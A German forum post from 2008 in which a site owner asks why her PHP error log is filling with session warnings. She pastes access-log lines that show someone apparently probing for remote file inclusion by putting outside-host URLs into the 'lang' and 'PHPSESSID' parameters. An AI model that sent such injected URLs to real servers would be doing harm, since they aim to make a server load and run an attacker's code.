seit drei Tagen quillt mein Errorlogfile mit PHP Fehlern und Warnungen über, weil irgendein Spider/Robot mit unterschiedlichen IP's ungültige Session-ID's erzeugt.
z.B.
Code: Alles auswählen
83.172.140.11 - - [03/Mar/2008:11:25:07 +0100] "GET /main.php?lang=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:08 +0100] "GET /main.php?lang=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:08 +0100] "GET /main.php?lang=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:09 +0100] "GET /main.php?lang=de&PHPSESSID=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:09 +0100] "GET /main.php?lang=de&PHPSESSID=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:10 +0100] "GET /main.php?lang=de&PHPSESSID=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:10 +0100] "GET /main.php?lang=de&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:10 +0100] "GET /main.php?lan=&PHPSESSID=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:11 +0100] "GET /main.php?lan=&PHPSESSID=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0"
83.172.140.11 - - [03/Mar/2008:11:25:11 +0100] "GET /main.php?lan=&PHPSESSID=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F HTTP/1.0"
Code: Alles auswählen
PHP Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent
PHP Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0
PHP Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0
Das nervt ziemlich und ich kann damit gar nichts anfangen.

Hat jemand ähnliche Erfahrungen?
Danke und Gruss
Sandra